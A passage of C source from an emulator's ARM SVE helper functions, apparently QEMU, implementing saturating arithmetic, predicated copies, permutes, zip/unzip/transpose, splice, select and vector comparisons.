(r < 0) { r = 0; } *(uint8_t *)((char *)d + i) = r; } } void HELPER(sve_uqaddi_h)(void *d, void *a, int32_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint16_t)) { int r = *(uint16_t *)((char *)a + i) + b; if (r > UINT16_MAX) { r = UINT16_MAX; } else if (r < 0) { r = 0; } *(uint16_t *)((char *)d + i) = r; } } void HELPER(sve_uqaddi_s)(void *d, void *a, int64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint32_t)) { int64_t r = *(uint32_t *)((char *)a + i) + b; if (r > UINT32_MAX) { r = UINT32_MAX; } else if (r < 0) { r = 0; } *(uint32_t *)((char *)d + i) = r; } } void HELPER(sve_uqaddi_d)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t r = *(uint64_t *)((char *)a + i) + b; if (r < b) { r = UINT64_MAX; } *(uint64_t *)((char *)d + i) = r; } } void HELPER(sve_uqsubi_d)(void *d, void *a, uint64_t b, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); for (i = 0; i < oprsz; i += sizeof(uint64_t)) { uint64_t ai = *(uint64_t *)((char *)a + i); *(uint64_t *)((char *)d + i) = (ai < b ? 0 : ai - b); } } /* Two operand predicated copy immediate with merge. All valid immediates * can fit within 17 signed bits in the simd_data field. 
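 * The b/h/s helpers splat the immediate across a uint64_t with dup_const
 * and expand the predicate to a byte mask PP, reducing the merge to the
 * branch-free d[i] = (mm & pp) | (nn & ~pp); the d helper selects per
 * element instead.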
*/
void HELPER(sve_cpy_m_b)(void *vd, void *vn, void *vg,
                         uint64_t mm, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd, *n = vn;
    uint8_t *pg = vg;

    mm = dup_const(MO_8, mm);
    for (i = 0; i < opr_sz; i += 1) {
        uint64_t nn = n[i];
        uint64_t pp = expand_pred_b(pg[H1(i)]);
        d[i] = (mm & pp) | (nn & ~pp);
    }
}

void HELPER(sve_cpy_m_h)(void *vd, void *vn, void *vg,
                         uint64_t mm, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd, *n = vn;
    uint8_t *pg = vg;

    mm = dup_const(MO_16, mm);
    for (i = 0; i < opr_sz; i += 1) {
        uint64_t nn = n[i];
        uint64_t pp = expand_pred_h(pg[H1(i)]);
        d[i] = (mm & pp) | (nn & ~pp);
    }
}

void HELPER(sve_cpy_m_s)(void *vd, void *vn, void *vg,
                         uint64_t mm, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd, *n = vn;
    uint8_t *pg = vg;

    mm = dup_const(MO_32, mm);
    for (i = 0; i < opr_sz; i += 1) {
        uint64_t nn = n[i];
        uint64_t pp = expand_pred_s(pg[H1(i)]);
        d[i] = (mm & pp) | (nn & ~pp);
    }
}

void HELPER(sve_cpy_m_d)(void *vd, void *vn, void *vg,
                         uint64_t mm, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd, *n = vn;
    uint8_t *pg = vg;

    for (i = 0; i < opr_sz; i += 1) {
        uint64_t nn = n[i];
        d[i] = (pg[H1(i)] & 1 ? mm : nn);
    }
}

void HELPER(sve_cpy_z_b)(void *vd, void *vg, uint64_t val, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd;
    uint8_t *pg = vg;

    val = dup_const(MO_8, val);
    for (i = 0; i < opr_sz; i += 1) {
        d[i] = val & expand_pred_b(pg[H1(i)]);
    }
}

void HELPER(sve_cpy_z_h)(void *vd, void *vg, uint64_t val, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd;
    uint8_t *pg = vg;

    val = dup_const(MO_16, val);
    for (i = 0; i < opr_sz; i += 1) {
        d[i] = val & expand_pred_h(pg[H1(i)]);
    }
}

void HELPER(sve_cpy_z_s)(void *vd, void *vg, uint64_t val, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd;
    uint8_t *pg = vg;

    val = dup_const(MO_32, val);
    for (i = 0; i < opr_sz; i += 1) {
        d[i] = val & expand_pred_s(pg[H1(i)]);
    }
}

void HELPER(sve_cpy_z_d)(void *vd, void *vg, uint64_t val, uint32_t desc)
{
    intptr_t i, opr_sz = simd_oprsz(desc) / 8;
    uint64_t *d = vd;
    uint8_t *pg = vg;

    for (i = 0; i < opr_sz; i += 1) {
        d[i] = (pg[H1(i)] & 1 ? val : 0);
    }
}

/* Big-endian hosts need to frob the byte indices.  If the copy
 * happens to be 8-byte aligned, then no frobbing is necessary.
 */
static void swap_memmove(void *vd, void *vs, size_t n)
{
    uintptr_t d = (uintptr_t)vd;
    uintptr_t s = (uintptr_t)vs;
    uintptr_t o = (d | s | n) & 7;
    size_t i;

#ifndef HOST_WORDS_BIGENDIAN
    o = 0;
#endif
    switch (o) {
    case 0:
        memmove(vd, vs, n);
        break;

    case 4:
        if (d < s || d >= s + n) {
            for (i = 0; i < n; i += 4) {
                *(uint32_t *)H1_4(d + i) = *(uint32_t *)H1_4(s + i);
            }
        } else {
            for (i = n; i > 0; ) {
                i -= 4;
                *(uint32_t *)H1_4(d + i) = *(uint32_t *)H1_4(s + i);
            }
        }
        break;

    case 2:
    case 6:
        if (d < s || d >= s + n) {
            for (i = 0; i < n; i += 2) {
                *(uint16_t *)H1_2(d + i) = *(uint16_t *)H1_2(s + i);
            }
        } else {
            for (i = n; i > 0; ) {
                i -= 2;
                *(uint16_t *)H1_2(d + i) = *(uint16_t *)H1_2(s + i);
            }
        }
        break;

    default:
        if (d < s || d >= s + n) {
            for (i = 0; i < n; i++) {
                *(uint8_t *)H1(d + i) = *(uint8_t *)H1(s + i);
            }
        } else {
            for (i = n; i > 0; ) {
                i -= 1;
                *(uint8_t *)H1(d + i) = *(uint8_t *)H1(s + i);
            }
        }
        break;
    }
}

/* Similarly for memset of 0. */
static void swap_memzero(void *vd, size_t n)
{
    uintptr_t d = (uintptr_t)vd;
    uintptr_t o = (d | n) & 7;
    size_t i;

    /* Usually, the first bit of a predicate is set, so N is 0.
*/ if (likely(n == 0)) { return; } #ifndef HOST_WORDS_BIGENDIAN o = 0; #endif switch (o) { case 0: memset(vd, 0, n); break; case 4: for (i = 0; i < n; i += 4) { *(uint32_t *)H1_4(d + i) = 0; } break; case 2: case 6: for (i = 0; i < n; i += 2) { *(uint16_t *)H1_2(d + i) = 0; } break; default: for (i = 0; i < n; i++) { *(uint8_t *)H1(d + i) = 0; } break; } } void HELPER(sve_ext)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t opr_sz = simd_oprsz(desc); size_t n_ofs = simd_data(desc); size_t n_siz = opr_sz - n_ofs; if (vd != vm) { swap_memmove(vd, (char *)vn + n_ofs, n_siz); swap_memmove((char *)vd + n_siz, vm, n_ofs); } else if (vd != vn) { swap_memmove((char *)vd + n_siz, vd, n_ofs); swap_memmove(vd, (char *)vn + n_ofs, n_siz); } else { /* vd == vn == vm. Need temp space. */ ARMVectorReg tmp; swap_memmove(&tmp, vm, n_ofs); swap_memmove(vd, (char *)vd + n_ofs, n_siz); memcpy((char *)vd + n_siz, &tmp, n_ofs); } } #define DO_INSR(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, uint64_t val, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ swap_memmove((char *)vd + sizeof(TYPE), vn, opr_sz - sizeof(TYPE)); \ *(TYPE *)((char *)vd + H(0)) = val; \ } DO_INSR(sve_insr_b, uint8_t, H1) DO_INSR(sve_insr_h, uint16_t, H1_2) DO_INSR(sve_insr_s, uint32_t, H1_4) DO_INSR(sve_insr_d, uint64_t, ) #undef DO_INSR void HELPER(sve_rev_b)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = bswap64(b); *(uint64_t *)((char *)vd + j) = bswap64(f); } } void HELPER(sve_rev_h)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = hswap64(b); *(uint64_t *)((char *)vd + j) = hswap64(f); } } void HELPER(sve_rev_s)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = rol64(b, 32); *(uint64_t *)((char *)vd + j) = rol64(f, 32); } } void HELPER(sve_rev_d)(void *vd, void *vn, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); for (i = 0, j = opr_sz - 8; i < opr_sz / 2; i += 8, j -= 8) { uint64_t f = *(uint64_t *)((char *)vn + i); uint64_t b = *(uint64_t *)((char *)vn + j); *(uint64_t *)((char *)vd + i) = b; *(uint64_t *)((char *)vd + j) = f; } } #define DO_TBL(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ uintptr_t elem = opr_sz / sizeof(TYPE); \ TYPE *d = vd, *n = vn, *m = vm; \ ARMVectorReg tmp; \ if (unlikely(vd == vn)) { \ n = memcpy(&tmp, vn, opr_sz); \ } \ for (i = 0; i < elem; i++) { \ TYPE j = m[H(i)]; \ d[H(i)] = j < elem ? 
n[H(j)] : 0;                               \
    }                                                          \
}

DO_TBL(sve_tbl_b, uint8_t, H1)
DO_TBL(sve_tbl_h, uint16_t, H2)
DO_TBL(sve_tbl_s, uint32_t, H4)
DO_TBL(sve_tbl_d, uint64_t, )

#undef DO_TBL

#define DO_UNPK(NAME, TYPED, TYPES, HD, HS)                    \
void HELPER(NAME)(void *vd, void *vn, uint32_t desc)           \
{                                                              \
    intptr_t i, opr_sz = simd_oprsz(desc);                     \
    TYPED *d = vd;                                             \
    TYPES *n = vn;                                             \
    ARMVectorReg tmp;                                          \
    if (unlikely((char *)vn - (char *)vd < opr_sz)) {          \
        n = memcpy(&tmp, n, opr_sz / 2);                       \
    }                                                          \
    for (i = 0; i < opr_sz / sizeof(TYPED); i++) {             \
        d[HD(i)] = n[HS(i)];                                   \
    }                                                          \
}

DO_UNPK(sve_sunpk_h, int16_t, int8_t, H2, H1)
DO_UNPK(sve_sunpk_s, int32_t, int16_t, H4, H2)
DO_UNPK(sve_sunpk_d, int64_t, int32_t, , H4)

DO_UNPK(sve_uunpk_h, uint16_t, uint8_t, H2, H1)
DO_UNPK(sve_uunpk_s, uint32_t, uint16_t, H4, H2)
DO_UNPK(sve_uunpk_d, uint64_t, uint32_t, , H4)

#undef DO_UNPK

/* Mask of bits included in the even numbered predicates of width esz.
 * We also use this for expand_bits/compress_bits, and so extend the
 * same pattern out to 16-bit units.
 */
static const uint64_t even_bit_esz_masks[5] = {
    0x5555555555555555ull,
    0x3333333333333333ull,
    0x0f0f0f0f0f0f0f0full,
    0x00ff00ff00ff00ffull,
    0x0000ffff0000ffffull,
};

/* Zero-extend units of 2**N bits to units of 2**(N+1) bits.
 * For N==0, this corresponds to the operation that in qemu/bitops.h
 * we call half_shuffle64; this algorithm is from Hacker's Delight,
 * section 7-2 Shuffling Bits.
 */
static uint64_t expand_bits(uint64_t x, int n)
{
    int i;

    x &= 0xffffffffu;
    for (i = 4; i >= n; i--) {
        int sh = 1 << i;
        x = ((x << sh) | x) & even_bit_esz_masks[i];
    }
    return x;
}

/* Compress units of 2**(N+1) bits to units of 2**N bits.
 * For N==0, this corresponds to the operation that in qemu/bitops.h
 * we call half_unshuffle64; this algorithm is from Hacker's Delight,
 * section 7-2 Shuffling Bits, where it is called an inverse half shuffle.
 */
static uint64_t compress_bits(uint64_t x, int n)
{
    int i;

    for (i = n; i <= 4; i++) {
        int sh = 1 << i;
        x &= even_bit_esz_masks[i];
        x = (x >> sh) | x;
    }
    return x & 0xffffffffu;
}

void HELPER(sve_zip_p)(void *vd, void *vn, void *vm, uint32_t pred_desc)
{
    intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2;
    int esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2);
    intptr_t high = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1);
    uint64_t *d = vd;
    intptr_t i;

    if (oprsz <= 8) {
        uint64_t nn = *(uint64_t *)vn;
        uint64_t mm = *(uint64_t *)vm;
        int half = 4 * oprsz;

        nn = extract64(nn, high * half, half);
        mm = extract64(mm, high * half, half);
        nn = expand_bits(nn, esz);
        mm = expand_bits(mm, esz);
        d[0] = nn + (mm << (1 << esz));
    } else {
        ARMPredicateReg tmp_n, tmp_m;

        /* We produce output faster than we consume input.
           Therefore we must be mindful of possible overlap.
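           When a source starts inside the destination's output window,
           it is first copied into a stack temporary (tmp_n/tmp_m) below.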
*/ if (((char *)vn - (char *)vd) < (uintptr_t)oprsz) { vn = memcpy(&tmp_n, vn, oprsz); } if (((char *)vm - (char *)vd) < (uintptr_t)oprsz) { vm = memcpy(&tmp_m, vm, oprsz); } if (high) { high = oprsz >> 1; } if ((high & 3) == 0) { uint32_t *n = vn, *m = vm; high >>= 2; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); i++) { uint64_t nn = n[H4(high + i)]; uint64_t mm = m[H4(high + i)]; nn = expand_bits(nn, esz); mm = expand_bits(mm, esz); d[i] = nn + (mm << (1 << esz)); } } else { uint8_t *n = vn, *m = vm; uint16_t *d16 = vd; for (i = 0; i < oprsz / 2; i++) { uint16_t nn = n[H1(high + i)]; uint16_t mm = m[H1(high + i)]; nn = expand_bits(nn, esz); mm = expand_bits(mm, esz); d16[H2(i)] = nn + (mm << (1 << esz)); } } } } void HELPER(sve_uzp_p)(void *vd, void *vn, void *vm, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; int esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); int odd = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1) << esz; uint64_t *d = vd, *n = vn, *m = vm; uint64_t l, h; intptr_t i; if (oprsz <= 8) { l = compress_bits(n[0] >> odd, esz); h = compress_bits(m[0] >> odd, esz); d[0] = extract64(l + (h << (4 * oprsz)), 0, 8 * oprsz); } else { ARMPredicateReg tmp_m; intptr_t oprsz_16 = oprsz / 16; if (((char *)vm - (char *)vd) < (uintptr_t)oprsz) { m = memcpy(&tmp_m, vm, oprsz); } for (i = 0; i < oprsz_16; i++) { l = n[2 * i + 0]; h = n[2 * i + 1]; l = compress_bits(l >> odd, esz); h = compress_bits(h >> odd, esz); d[i] = l + (h << 32); } /* For VL which is not a power of 2, the results from M do not align nicely with the uint64_t for D. Put the aligned results from M into TMP_M and then copy it into place afterward. */ if (oprsz & 15) { d[i] = compress_bits(n[2 * i] >> odd, esz); for (i = 0; i < oprsz_16; i++) { l = m[2 * i + 0]; h = m[2 * i + 1]; l = compress_bits(l >> odd, esz); h = compress_bits(h >> odd, esz); tmp_m.p[i] = l + (h << 32); } tmp_m.p[i] = compress_bits(m[2 * i] >> odd, esz); swap_memmove((char *)vd + oprsz / 2, &tmp_m, oprsz / 2); } else { for (i = 0; i < oprsz_16; i++) { l = m[2 * i + 0]; h = m[2 * i + 1]; l = compress_bits(l >> odd, esz); h = compress_bits(h >> odd, esz); d[oprsz_16 + i] = l + (h << 32); } } } } void HELPER(sve_trn_p)(void *vd, void *vn, void *vm, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; uintptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); bool odd = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1); uint64_t *d = vd, *n = vn, *m = vm; uint64_t mask; int shr, shl; intptr_t i; shl = 1 << esz; shr = 0; mask = even_bit_esz_masks[esz]; if (odd) { mask <<= shl; shr = shl; shl = 0; } for (i = 0; i < DIV_ROUND_UP(oprsz, 8); i++) { uint64_t nn = (n[i] & mask) >> shr; uint64_t mm = (m[i] & mask) << shl; d[i] = nn + mm; } } /* Reverse units of 2**N bits. 
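 * For example (illustrative): reverse_bits_8(0x01, 0) == 0x80 reverses
 * individual bits, while reverse_bits_8(0x12, 2) == 0x21 swaps only the
 * two nibbles.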
*/ static uint64_t reverse_bits_64(uint64_t x, int n) { int i, sh; x = bswap64(x); for (i = 2, sh = 4; i >= n; i--, sh >>= 1) { uint64_t mask = even_bit_esz_masks[i]; x = ((x & mask) << sh) | ((x >> sh) & mask); } return x; } static uint8_t reverse_bits_8(uint8_t x, int n) { static const uint8_t mask[3] = { 0x55, 0x33, 0x0f }; int i, sh; for (i = 2, sh = 4; i >= n; i--, sh >>= 1) { x = ((x & mask[i]) << sh) | ((x >> sh) & mask[i]); } return x; } void HELPER(sve_rev_p)(void *vd, void *vn, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; int esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); intptr_t i, oprsz_2 = oprsz / 2; if (oprsz <= 8) { uint64_t l = *(uint64_t *)vn; l = reverse_bits_64(l << (64 - 8 * oprsz), esz); *(uint64_t *)vd = l; } else if ((oprsz & 15) == 0) { for (i = 0; i < oprsz_2; i += 8) { intptr_t ih = oprsz - 8 - i; uint64_t l = reverse_bits_64(*(uint64_t *)((char *)vn + i), esz); uint64_t h = reverse_bits_64(*(uint64_t *)((char *)vn + ih), esz); *(uint64_t *)((char *)vd + i) = h; *(uint64_t *)((char *)vd + ih) = l; } } else { for (i = 0; i < oprsz_2; i += 1) { intptr_t il = H1(i); intptr_t ih = H1(oprsz - 1 - i); uint8_t l = reverse_bits_8(*(uint8_t *)((char *)vn + il), esz); uint8_t h = reverse_bits_8(*(uint8_t *)((char *)vn + ih), esz); *(uint8_t *)((char *)vd + il) = h; *(uint8_t *)((char *)vd + ih) = l; } } } void HELPER(sve_punpk_p)(void *vd, void *vn, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t high = extract32(pred_desc, SIMD_DATA_SHIFT + 2, 1); uint64_t *d = vd; intptr_t i; if (oprsz <= 8) { uint64_t nn = *(uint64_t *)vn; int half = 4 * oprsz; nn = extract64(nn, high * half, half); nn = expand_bits(nn, 0); d[0] = nn; } else { ARMPredicateReg tmp_n; /* We produce output faster than we consume input. Therefore we must be mindful of possible overlap. */ if (((char *)vn - (char *)vd) < (uintptr_t)oprsz) { vn = memcpy(&tmp_n, vn, oprsz); } if (high) { high = oprsz >> 1; } if ((high & 3) == 0) { uint32_t *n = vn; high >>= 2; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); i++) { uint64_t nn = n[H4(high + i)]; d[i] = expand_bits(nn, 0); } } else { uint16_t *d16 = vd; uint8_t *n = vn; for (i = 0; i < oprsz / 2; i++) { uint16_t nn = n[H1(high + i)]; d16[H2(i)] = expand_bits(nn, 0); } } } } #define DO_ZIP(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t i, oprsz_2 = oprsz / 2; \ ARMVectorReg tmp_n, tmp_m; \ /* We produce output faster than we consume input. \ Therefore we must be mindful of possible overlap. 
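       For example (illustrative), sve_zip_b interleaves the low halves  \
       of ZN and ZM as { n0, m0, n1, m1, ... }.                          \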
*/ \ if (unlikely(((char *)vn - (char *)vd) < (uintptr_t)oprsz)) { \ vn = memcpy(&tmp_n, vn, oprsz_2); \ } \ if (unlikely(((char *)vm - (char *)vd) < (uintptr_t)oprsz)) { \ vm = memcpy(&tmp_m, vm, oprsz_2); \ } \ for (i = 0; i < oprsz_2; i += sizeof(TYPE)) { \ *(TYPE *)((char *)vd + H(2 * i + 0)) = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(2 * i + sizeof(TYPE))) = *(TYPE *)((char *)vm + H(i)); \ } \ } DO_ZIP(sve_zip_b, uint8_t, H1) DO_ZIP(sve_zip_h, uint16_t, H1_2) DO_ZIP(sve_zip_s, uint32_t, H1_4) DO_ZIP(sve_zip_d, uint64_t, ) #define DO_UZP(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t oprsz_2 = oprsz / 2; \ intptr_t odd_ofs = simd_data(desc); \ intptr_t i; \ ARMVectorReg tmp_m; \ if (unlikely(((char *)vm - (char *)vd) < (uintptr_t)oprsz)) { \ vm = memcpy(&tmp_m, vm, oprsz); \ } \ for (i = 0; i < oprsz_2; i += sizeof(TYPE)) { \ *(TYPE *)((char *)vd + H(i)) = *(TYPE *)((char *)vn + H(2 * i + odd_ofs)); \ } \ for (i = 0; i < oprsz_2; i += sizeof(TYPE)) { \ *(TYPE *)((char *)vd + H(oprsz_2 + i)) = *(TYPE *)((char *)vm + H(2 * i + odd_ofs)); \ } \ } DO_UZP(sve_uzp_b, uint8_t, H1) DO_UZP(sve_uzp_h, uint16_t, H1_2) DO_UZP(sve_uzp_s, uint32_t, H1_4) DO_UZP(sve_uzp_d, uint64_t, ) #define DO_TRN(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, uint32_t desc) \ { \ intptr_t oprsz = simd_oprsz(desc); \ intptr_t odd_ofs = simd_data(desc); \ intptr_t i; \ for (i = 0; i < oprsz; i += 2 * sizeof(TYPE)) { \ TYPE ae = *(TYPE *)((char *)vn + H(i + odd_ofs)); \ TYPE be = *(TYPE *)((char *)vm + H(i + odd_ofs)); \ *(TYPE *)((char *)vd + H(i + 0)) = ae; \ *(TYPE *)((char *)vd + H(i + sizeof(TYPE))) = be; \ } \ } DO_TRN(sve_trn_b, uint8_t, H1) DO_TRN(sve_trn_h, uint16_t, H1_2) DO_TRN(sve_trn_s, uint32_t, H1_4) DO_TRN(sve_trn_d, uint64_t, ) #undef DO_ZIP #undef DO_UZP #undef DO_TRN void HELPER(sve_compact_s)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc) / 4; uint32_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = j = 0; i < opr_sz; i++) { if (pg[H1(i / 2)] & (i & 1 ? 0x10 : 0x01)) { d[H4(j)] = n[H4(i)]; j++; } } for (; j < opr_sz; j++) { d[H4(j)] = 0; } } void HELPER(sve_compact_d)(void *vd, void *vn, void *vg, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn; uint8_t *pg = vg; for (i = j = 0; i < opr_sz; i++) { if (pg[H1(i)] & 1) { d[j] = n[i]; j++; } } for (; j < opr_sz; j++) { d[j] = 0; } } /* Similar to the ARM LastActiveElement pseudocode function, except the * result is multiplied by the element size. This includes the not found * indication; e.g. not found for esz=3 is -8. */ int32_t HELPER(sve_last_active_element)(void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); return last_active_element(vg, DIV_ROUND_UP(oprsz, 8), esz); } void HELPER(sve_splice)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t opr_sz = simd_oprsz(desc) / 8; int esz = simd_data(desc); uint64_t pg, first_g, last_g, len, mask = pred_esz_masks[esz]; intptr_t i, first_i, last_i; ARMVectorReg tmp; first_i = last_i = 0; first_g = last_g = 0; /* Find the extent of the active elements within VG. 
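     * FIRST_I/LAST_I become bit indices into the predicate; since each
     * predicate bit governs one vector byte, they double as byte offsets
     * into ZN for the copy below.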
*/ for (i = QEMU_ALIGN_UP(opr_sz, 8) - 8; i >= 0; i -= 8) { pg = *(uint64_t *)((char *)vg + i) & mask; if (pg) { if (last_g == 0) { last_g = pg; last_i = i; } first_g = pg; first_i = i; } } len = 0; if (first_g != 0) { first_i = first_i * 8 + ctz64(first_g); last_i = last_i * 8 + 63 - clz64(last_g); len = last_i - first_i + (1ULL << esz); if (vd == vm) { vm = memcpy(&tmp, vm, opr_sz * 8); } swap_memmove(vd, (char *)vn + first_i, len); } swap_memmove((char *)vd + len, vm, opr_sz * 8 - len); } void HELPER(sve_sel_zpzz_b)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; uint64_t pp = expand_pred_b(pg[H1(i)]); d[i] = (nn & pp) | (mm & ~pp); } } void HELPER(sve_sel_zpzz_h)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; uint64_t pp = expand_pred_h(pg[H1(i)]); d[i] = (nn & pp) | (mm & ~pp); } } void HELPER(sve_sel_zpzz_s)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; uint64_t pp = expand_pred_s(pg[H1(i)]); d[i] = (nn & pp) | (mm & ~pp); } } void HELPER(sve_sel_zpzz_d)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc) / 8; uint64_t *d = vd, *n = vn, *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i += 1) { uint64_t nn = n[i], mm = m[i]; d[i] = (pg[H1(i)] & 1 ? nn : mm); } } /* Two operand comparison controlled by a predicate. * ??? It is very tempting to want to be able to expand this inline * with x86 instructions, e.g. * * vcmpeqw zm, zn, %ymm0 * vpmovmskb %ymm0, %eax * and $0x5555, %eax * and pg, %eax * * or even aarch64, e.g. * * // mask = 4000 1000 0400 0100 0040 0010 0004 0001 * cmeq v0.8h, zn, zm * and v0.8h, v0.8h, mask * addv h0, v0.8h * and v0.8b, pg * * However, coming up with an abstraction that allows vector inputs and * a scalar output, and also handles the byte-ordering of sub-uint64_t * scalar outputs, is tricky. 
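 * So we settle for the portable loop below, which also accumulates the
 * NZCV predicate-test flags via iter_predtest_bwd as it goes.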
*/ #define DO_CMP_PPZZ(NAME, TYPE, OP, H, MASK) \ uint32_t HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ uint32_t flags = PREDTEST_INIT; \ intptr_t i = opr_sz; \ do { \ uint64_t out = 0, pg; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ out |= nn OP mm; \ } while (i & 63); \ pg = *(uint64_t *)((char *)vg + (i >> 3)) & MASK; \ out &= pg; \ *(uint64_t *)((char *)vd + (i >> 3)) = out; \ flags = iter_predtest_bwd(out, pg, flags); \ } while (i > 0); \ return flags; \ } #define DO_CMP_PPZZ_B(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, H1, 0xffffffffffffffffull) #define DO_CMP_PPZZ_H(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, H1_2, 0x5555555555555555ull) #define DO_CMP_PPZZ_S(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, H1_4, 0x1111111111111111ull) #define DO_CMP_PPZZ_D(NAME, TYPE, OP) \ DO_CMP_PPZZ(NAME, TYPE, OP, , 0x0101010101010101ull) DO_CMP_PPZZ_B(sve_cmpeq_ppzz_b, uint8_t, ==) DO_CMP_PPZZ_H(sve_cmpeq_ppzz_h, uint16_t, ==) DO_CMP_PPZZ_S(sve_cmpeq_ppzz_s, uint32_t, ==) DO_CMP_PPZZ_D(sve_cmpeq_ppzz_d, uint64_t, ==) DO_CMP_PPZZ_B(sve_cmpne_ppzz_b, uint8_t, !=) DO_CMP_PPZZ_H(sve_cmpne_ppzz_h, uint16_t, !=) DO_CMP_PPZZ_S(sve_cmpne_ppzz_s, uint32_t, !=) DO_CMP_PPZZ_D(sve_cmpne_ppzz_d, uint64_t, !=) DO_CMP_PPZZ_B(sve_cmpgt_ppzz_b, int8_t, >) DO_CMP_PPZZ_H(sve_cmpgt_ppzz_h, int16_t, >) DO_CMP_PPZZ_S(sve_cmpgt_ppzz_s, int32_t, >) DO_CMP_PPZZ_D(sve_cmpgt_ppzz_d, int64_t, >) DO_CMP_PPZZ_B(sve_cmpge_ppzz_b, int8_t, >=) DO_CMP_PPZZ_H(sve_cmpge_ppzz_h, int16_t, >=) DO_CMP_PPZZ_S(sve_cmpge_ppzz_s, int32_t, >=) DO_CMP_PPZZ_D(sve_cmpge_ppzz_d, 